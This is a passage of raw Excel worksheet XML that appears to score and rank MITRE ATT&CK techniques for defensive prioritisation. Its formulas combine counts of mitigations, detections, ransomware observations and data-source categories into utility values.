        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT16" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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7" spans="1:47" ht="51">
      <c r="A17" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B17" s="37">
        <f t="shared" si="0"/>
        <v>19.827128380952381</v>
      </c>
      <c r="C17" s="37" t="s">
        <v>122</v>
      </c>
      <c r="D17" s="50" t="s">
        <v>123</v>
      </c>
      <c r="E17" s="37"/>
      <c r="F17" s="37">
        <v>3</v>
      </c>
      <c r="G17" s="37">
        <v>1</v>
      </c>
      <c r="H17" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I17" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J17" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K17" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L17" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M17" s="37">
        <v>2.6679999999999998E-3</v>
      </c>
      <c r="N17" s="56">
        <v>0</v>
      </c>
      <c r="O17" s="56">
        <v>7</v>
      </c>
      <c r="P17" s="56">
        <v>2</v>
      </c>
      <c r="Q17" s="56">
        <v>1</v>
      </c>
      <c r="R17" s="57"/>
      <c r="S17" s="57">
        <v>0</v>
      </c>
      <c r="T17" s="57" t="s">
        <v>105</v>
      </c>
      <c r="U17" s="57">
        <v>13</v>
      </c>
      <c r="V17" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17142876190476192</v>
      </c>
      <c r="W17" s="37">
        <v>13</v>
      </c>
      <c r="X17" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y17" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z17" s="37">
        <v>10</v>
      </c>
      <c r="AA17" s="37">
        <v>0.1</v>
      </c>
      <c r="AB17" s="37">
        <v>0.1</v>
      </c>
      <c r="AC17" s="37"/>
      <c r="AD17" s="50" t="s">
        <v>124</v>
      </c>
      <c r="AE17" s="37" t="str" cm="1">
        <f t="array" ref="AE17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD17)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF17" s="37">
        <v>13</v>
      </c>
      <c r="AG17" s="37" t="str" cm="1">
        <f t="array" ref="AG17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH17" s="37">
        <v>13</v>
      </c>
      <c r="AI17" s="37" t="str" cm="1">
        <f t="array" ref="AI17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD17)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ17" s="37">
        <v>13</v>
      </c>
      <c r="AK17" s="37" t="str" cm="1">
        <f t="array" ref="AK17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL17" s="37">
        <v>13</v>
      </c>
      <c r="AM17" s="37" t="str" cm="1">
        <f t="array" ref="AM17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN17" s="37">
        <v>0</v>
      </c>
      <c r="AO17" s="37">
        <v>2</v>
      </c>
      <c r="AP17" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ17" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.6090427936507936</v>
      </c>
      <c r="AR17" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS17" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT17" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU1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0.36233537112622827</v>
      </c>
    </row>
    <row r="18" spans="1:47" ht="17">
      <c r="A18" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B18" s="37">
        <f t="shared" si="0"/>
        <v>6.2428571428571429</v>
      </c>
      <c r="C18" s="37" t="s">
        <v>125</v>
      </c>
      <c r="D18" s="50" t="s">
        <v>126</v>
      </c>
      <c r="E18" s="37"/>
      <c r="F18" s="37">
        <v>1</v>
      </c>
      <c r="G18" s="37">
        <v>1</v>
      </c>
      <c r="H18" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I18" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J18" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K18" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L18" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M18" s="37">
        <v>0</v>
      </c>
      <c r="N18" s="56">
        <v>0</v>
      </c>
      <c r="O18" s="56">
        <v>1</v>
      </c>
      <c r="P18" s="56">
        <v>1</v>
      </c>
      <c r="Q18" s="56">
        <v>0</v>
      </c>
      <c r="R18" s="57"/>
      <c r="S18" s="57">
        <v>0</v>
      </c>
      <c r="T18" s="57"/>
      <c r="U18" s="57">
        <v>0</v>
      </c>
      <c r="V18" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W18" s="37">
        <v>0</v>
      </c>
      <c r="X18" s="37">
        <v>0</v>
      </c>
      <c r="Y18" s="37">
        <v>0</v>
      </c>
      <c r="Z18" s="37">
        <v>2</v>
      </c>
      <c r="AA18" s="37">
        <v>0.02</v>
      </c>
      <c r="AB18" s="37">
        <v>0.02</v>
      </c>
      <c r="AC18" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD18" s="50" t="s">
        <v>128</v>
      </c>
      <c r="AE18" s="37" t="str" cm="1">
        <f t="array" ref="AE18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD18)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF18" s="37">
        <v>14</v>
      </c>
      <c r="AG18" s="37" t="str" cm="1">
        <f t="array" ref="AG18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH18" s="37">
        <v>14</v>
      </c>
      <c r="AI18" s="37" t="str" cm="1">
        <f t="array" ref="AI18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ18" s="37">
        <v>14</v>
      </c>
      <c r="AK18" s="37" t="str" cm="1">
        <f t="array" ref="AK18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL18" s="37">
        <v>14</v>
      </c>
      <c r="AM18" s="37" t="str" cm="1">
        <f t="array" ref="AM18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD18)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN18" s="37">
        <v>0</v>
      </c>
      <c r="AO18" s="37">
        <v>0</v>
      </c>
      <c r="AP18" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ18" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.0809523809523811</v>
      </c>
      <c r="AR18" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS18" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT18" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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9" spans="1:47" ht="34">
      <c r="A19" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B19" s="37">
        <f t="shared" si="0"/>
        <v>7.5523809523809522</v>
      </c>
      <c r="C19" s="37" t="s">
        <v>129</v>
      </c>
      <c r="D19" s="50" t="s">
        <v>130</v>
      </c>
      <c r="E19" s="37"/>
      <c r="F19" s="37">
        <v>1</v>
      </c>
      <c r="G19" s="37">
        <v>1</v>
      </c>
      <c r="H19" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I19" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J19" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K19" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L19" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M19" s="37">
        <v>0</v>
      </c>
      <c r="N19" s="56">
        <v>2</v>
      </c>
      <c r="O19" s="56">
        <v>3</v>
      </c>
      <c r="P19" s="56">
        <v>0</v>
      </c>
      <c r="Q19" s="56">
        <v>0</v>
      </c>
      <c r="R19" s="57"/>
      <c r="S19" s="57">
        <v>0</v>
      </c>
      <c r="T19" s="57"/>
      <c r="U19" s="57">
        <v>0</v>
      </c>
      <c r="V19" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W19" s="37">
        <v>0</v>
      </c>
      <c r="X19" s="37">
        <v>0</v>
      </c>
      <c r="Y19" s="37">
        <v>0</v>
      </c>
      <c r="Z19" s="37">
        <v>5</v>
      </c>
      <c r="AA19" s="37">
        <v>0.05</v>
      </c>
      <c r="AB19" s="37">
        <v>0.05</v>
      </c>
      <c r="AC19" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD19" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE19" s="37" t="str" cm="1">
        <f t="array" ref="AE19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD19)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF19" s="37">
        <v>15</v>
      </c>
      <c r="AG19" s="37" t="str" cm="1">
        <f t="array" ref="AG19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH19" s="37">
        <v>15</v>
      </c>
      <c r="AI19" s="37" t="str" cm="1">
        <f t="array" ref="AI19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ19" s="37">
        <v>15</v>
      </c>
      <c r="AK19" s="37" t="str" cm="1">
        <f t="array" ref="AK19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL19" s="37">
        <v>15</v>
      </c>
      <c r="AM19" s="37" t="str" cm="1">
        <f t="array" ref="AM19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN19" s="37">
        <v>0</v>
      </c>
      <c r="AO19" s="37">
        <v>1</v>
      </c>
      <c r="AP19" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ19" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.5174603174603174</v>
      </c>
      <c r="AR19" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS19" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT19" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU1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8.3749055177626597E-2</v>
      </c>
    </row>
    <row r="20" spans="1:47" ht="34">
      <c r="A20" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B20" s="37">
        <f t="shared" si="0"/>
        <v>13.309517619047618</v>
      </c>
      <c r="C20" s="37" t="s">
        <v>132</v>
      </c>
      <c r="D20" s="50" t="s">
        <v>133</v>
      </c>
      <c r="E20" s="37"/>
      <c r="F20" s="37">
        <v>1</v>
      </c>
      <c r="G20" s="37">
        <v>1</v>
      </c>
      <c r="H20" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I20" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J20" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K20" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L20" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M20" s="37">
        <v>0</v>
      </c>
      <c r="N20" s="56">
        <v>0</v>
      </c>
      <c r="O20" s="56">
        <v>2</v>
      </c>
      <c r="P20" s="56">
        <v>0</v>
      </c>
      <c r="Q20" s="56">
        <v>0</v>
      </c>
      <c r="R20" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S20" s="57">
        <v>2</v>
      </c>
      <c r="T20" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U20" s="57">
        <v>8</v>
      </c>
      <c r="V20" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476180952380952</v>
      </c>
      <c r="W20" s="37">
        <v>10</v>
      </c>
      <c r="X20" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y20" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z20" s="37">
        <v>2</v>
      </c>
      <c r="AA20" s="37">
        <v>0.02</v>
      </c>
      <c r="AB20" s="37">
        <v>0.02</v>
      </c>
      <c r="AC20" s="37"/>
      <c r="AD20" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE20" s="37" t="str" cm="1">
        <f t="array" ref="AE20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF20" s="37">
        <v>16</v>
      </c>
      <c r="AG20" s="37" t="str" cm="1">
        <f t="array" ref="AG20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD20)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH20" s="37">
        <v>16</v>
      </c>
      <c r="AI20" s="37" t="str" cm="1">
        <f t="array" ref="AI20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ20" s="37">
        <v>16</v>
      </c>
      <c r="AK20" s="37" t="str" cm="1">
        <f t="array" ref="AK20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL20" s="37">
        <v>16</v>
      </c>
      <c r="AM20" s="37" t="str" cm="1">
        <f t="array" ref="AM20">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD20)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN20" s="37">
        <v>0</v>
      </c>
      <c r="AO20" s="37">
        <v>0</v>
      </c>
      <c r="AP20" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ20" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4365058730158724</v>
      </c>
      <c r="AR20" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS20" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT20" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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1" spans="1:47" ht="34">
      <c r="A21" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B21" s="37">
        <f t="shared" si="0"/>
        <v>7.5571428571428569</v>
      </c>
      <c r="C21" s="37" t="s">
        <v>137</v>
      </c>
      <c r="D21" s="50" t="s">
        <v>138</v>
      </c>
      <c r="E21" s="37"/>
      <c r="F21" s="37">
        <v>1</v>
      </c>
      <c r="G21" s="37">
        <v>1</v>
      </c>
      <c r="H21" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I21" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J21" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K21" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L21" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M21" s="37">
        <v>0</v>
      </c>
      <c r="N21" s="56">
        <v>1</v>
      </c>
      <c r="O21" s="56">
        <v>1</v>
      </c>
      <c r="P21" s="56">
        <v>0</v>
      </c>
      <c r="Q21" s="56">
        <v>0</v>
      </c>
      <c r="R21" s="57"/>
      <c r="S21" s="57">
        <v>0</v>
      </c>
      <c r="T21" s="57"/>
      <c r="U21" s="57">
        <v>0</v>
      </c>
      <c r="V21" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W21" s="37">
        <v>0</v>
      </c>
      <c r="X21" s="37">
        <v>0</v>
      </c>
      <c r="Y21" s="37">
        <v>0</v>
      </c>
      <c r="Z21" s="37">
        <v>2</v>
      </c>
      <c r="AA21" s="37">
        <v>0.02</v>
      </c>
      <c r="AB21" s="37">
        <v>0.02</v>
      </c>
      <c r="AC21" s="37"/>
      <c r="AD21" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE21" s="37" t="str" cm="1">
        <f t="array" ref="AE21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD21)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF21" s="37">
        <v>17</v>
      </c>
      <c r="AG21" s="37" t="str" cm="1">
        <f t="array" ref="AG21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH21" s="37">
        <v>17</v>
      </c>
      <c r="AI21" s="37" t="str" cm="1">
        <f t="array" ref="AI21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ21" s="37">
        <v>17</v>
      </c>
      <c r="AK21" s="37" t="str" cm="1">
        <f t="array" ref="AK21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL21" s="37">
        <v>17</v>
      </c>
      <c r="AM21" s="37" t="str" cm="1">
        <f t="array" ref="AM21">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD21)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN21" s="37">
        <v>0</v>
      </c>
      <c r="AO21" s="37">
        <v>0</v>
      </c>
      <c r="AP21" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ21" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.519047619047619</v>
      </c>
      <c r="AR21" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS21" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT21" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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2" spans="1:47" ht="68">
      <c r="A22" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B22" s="37">
        <f t="shared" si="0"/>
        <v>12.166677095238095</v>
      </c>
      <c r="C22" s="37" t="s">
        <v>139</v>
      </c>
      <c r="D22" s="50" t="s">
        <v>140</v>
      </c>
      <c r="E22" s="37"/>
      <c r="F22" s="37">
        <v>1</v>
      </c>
      <c r="G22" s="37">
        <v>1</v>
      </c>
      <c r="H22" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I22" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J22" s="37">
